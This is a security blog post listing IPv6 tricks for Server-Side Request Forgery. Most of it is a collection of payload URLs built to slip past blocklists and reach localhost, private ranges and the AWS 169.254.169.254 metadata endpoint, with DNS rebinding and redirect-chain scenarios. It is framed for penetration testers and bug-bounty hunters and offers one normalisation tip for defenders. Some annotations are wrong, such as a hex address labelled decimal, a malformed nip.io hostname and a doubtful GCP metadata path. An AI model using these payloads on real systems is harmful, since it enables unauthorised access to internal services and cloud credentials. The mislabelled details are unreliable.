IPv6-Based SSRF: Techniques and Practical Payloads

Server-Side Request Forgery (SSRF) is a critical vulnerability that allows attackers to force a server to send unintended requests to…

Moslem Haghighian

~4 min read · February 17, 2026 (Updated: February 19, 2026) · Free: Yes

Server-Side Request Forgery (SSRF) is a critical vulnerability that allows attackers to force a server to send unintended requests to internal or protected resources. While many security controls focus heavily on IPv4, IPv6 often receives less validation, creating new opportunities for bypasses.

This article explores practical IPv6-based SSRF techniques, real-world payload examples, and key considerations for penetration testers and bug bounty hunters.

1. IPv6 Loopback Bypass

The IPv6 loopback address (::1) provides access to localhost, often evading filters that only block 127.0.0.1.

Payloads:

http://[::1]/
http://[0:0:0:0:0:0:0:1]/
http://[0000:0000:0000:0000:0000:0000:0000:0001]/

Zero-padding and alternative representations can bypass weak regex filters.

2. IPv4 Embedded in IPv6

IPv4 addresses can be embedded within IPv6 notation, circumventing IPv4‑only blocklists.

Payloads:

http://[::ffff:127.0.0.1]/
http://[0:0:0:0:0:ffff:127.0.0.1]/
http://[::ffff:7f00:1]/
http://[::ffff:2130706433]/        # Decimal
http://[::ffff:0x7f.0.0.1]/        # Hex octet
http://[::ffff:0251.254.169.254]/  # Octal (AWS metadata)

Hex, octal, and decimal encodings can further confuse validation logic.

3. Normalization & Shorthand Confusion

IPv6 allows multiple equivalent representations, which may cause inconsistent parsing across different components.

Payloads:

http://[0000::1]/
http://[::]/
http://[::127.0.0.1]/

Some implementations normalize addresses differently, leading to bypass scenarios.

4. Userinfo Parsing Discrepancies

Embedding credentials in the URL can trigger parser mismatches: the validation layer may check the hostname after the @, while the underlying HTTP client uses the actual target.

Payloads:

http://example.com@[::1]/
http://user:pass@[::ffff:127.0.0.1]/

This technique exploits inconsistencies between URL parsers.

5. Link-Local IPv6 Addresses

Link-local addresses (fe80::/10) are only accessible within the local network but can expose internal services in dual‑stack environments.

Payloads:

http://[fe80::1]/
http://[fe80::]/

Note: On Linux, a zone identifier (e.g., %eth0) is often required to specify the network interface. This must be URL‑encoded as %25eth0.

6. Zone Identifier Injection

Adding an interface identifier can sometimes bypass naive parsers or decoders.

Payloads:

http://[::ffff:127.0.0.1%25eth0]/
http://[fe80::1%25en0]/

Percent signs must be encoded as %25. On Windows, numeric zone IDs (e.g., %1) work similarly.

7. DNS Rebinding with IPv6

DNS rebinding can redirect a trusted domain to an internal IPv6 address after the initial resolution.

Scenario:

attacker-domain.com → initially resolves to 203.0.113.1 (public)
                     → later resolves to [::ffff:169.254.169.254] (AWS metadata)

This exposes cloud metadata endpoints that would otherwise be blocked.

Example metadata URLs:

http://[::ffff:169.254.169.254]/latest/meta-data/      # AWS
http://[::ffff:169.254.169.254]/metadata/              # GCP

8. Redirect Chain Abuse

Chaining HTTP redirects may bypass per‑request filtering if the validation only checks the initial URL.

Scenario:

http://redirect1.com → 302 → http://redirect2.com → 302 → http://[::1]/

Multiple redirects can exhaust validation checks or hide the final internal target.

9. Mixed Encoding Tricks

Encoding IP components in unusual formats can slip past weak validation.

Payloads:

http://[::ffff:0x7f.0.0.1]/
http://[::ffff:0251.254.169.254]/
http://[::ffff:2130706433]/

These use hex, octal, or decimal representations of IPv4 octets.

10. Unicode Digit Mixing

Unicode full‑width digits may evade simplistic regex filters, though this is rare in practice.

Payloads:

http://[::１]/
http://[::ffff:１２７.０.０.１]/

If a normalization step converts these to ASCII before validation, they may pass through.

11. Dynamic DNS Resolution Domains

Services like nip.io embed IP addresses directly into domain names, bypassing filters that block raw IP literals.

Payloads:

http://[::ffff:127.0.0.1].nip.io/
http://[fe80::1].sslip.io/
http://127.0.0.1.nip.io/                # IPv4 version still works, but IPv6 variants are often overlooked

12. HTTP Version Switching

Different HTTP versions may trigger inconsistent validation. Some legacy backends handle Host headers differently for HTTP/1.0 vs. HTTP/1.1.

Example:

GET / HTTP/1.0
Host: [::1]

If the validation logic only applies to HTTP/1.1 requests, this could slip through.

13. Unique Local Addresses (ULA)

ULA ranges (fc00::/7) are the IPv6 equivalent of RFC1918 private addresses. They are often omitted from blocklists that focus solely on IPv4 private space.

Payloads:

http://[fc00::1]/
http://[fd00::1]/

These are reachable in internal networks where IPv6 is enabled.

14. Rare or Mixed Notations

Combining different encoding styles can confuse parsers that do not fully normalize addresses.

Payloads:

http://[::ffff:a9fe:a9fe]/                # 169.254.169.254 in hex
http://0x7f000001/                         # 127.0.0.1 as decimal (no brackets)

These are useful when validation layers are inconsistent.

15. CIDR / Blocklist Bypass

Blocklists sometimes ignore certain IPv6 ranges or fail to normalize addresses correctly. For example, if a blocklist denies ::1 but permits 0:0:0:0:0:0:0:1, normalization discrepancies become exploitable.

Concept:

Target addresses within allowed /128 ranges.
Use expanded or compressed forms to evade CIDR‑based blocks.

Tip: Always normalize addresses (e.g., using inet_pton) before applying filters to avoid such bypasses.

Key Considerations for IPv6 SSRF Testing

ConsiderationDescriptionEnvironmentTesting is only meaningful in IPv6‑enabled or dual‑stack environments.NormalizationAlways validate addresses after full normalization (e.g., with inet_pton).Parser ConsistencyBe aware of differences between URL parsers, DNS resolvers, and HTTP clients.IPv4‑mapped IPv6On Linux, ::ffff:127.0.0.1 may be treated as IPv4 by the kernel but filtered separately by firewall rules.Zone IdentifiersInterface specifiers (%eth0) are OS‑specific and must be properly encoded.

Final Thoughts

IPv6‑based SSRF vectors are still frequently overlooked in security testing. However, in real penetration tests and bug bounty programs, even simple IPv6 payloads can expose internal services, metadata endpoints, and localhost interfaces.

Understanding normalization, parser behavior, and encoding tricks can significantly increase your SSRF testing effectiveness.

Happy hunting!

#SSRF #IPv6 #Pentest #BugBounty #WebSecurity

#bug-bounty #ssrf #penetration-testing #cybersecurity #hacking

IPv6-Based SSRF: Techniques and Practical Payloads

Server-Side Request Forgery (SSRF) is a critical vulnerability that allows attackers to force a server to send unintended requests to…

1. IPv6 Loopback Bypass

2. IPv4 Embedded in IPv6

3. Normalization & Shorthand Confusion

4. Userinfo Parsing Discrepancies

5. Link-Local IPv6 Addresses

6. Zone Identifier Injection

7. DNS Rebinding with IPv6

8. Redirect Chain Abuse

9. Mixed Encoding Tricks

10. Unicode Digit Mixing

11. Dynamic DNS Resolution Domains

12. HTTP Version Switching

13. Unique Local Addresses (ULA)

14. Rare or Mixed Notations

15. CIDR / Blocklist Bypass

Key Considerations for IPv6 SSRF Testing

Final Thoughts

Reporting a Problem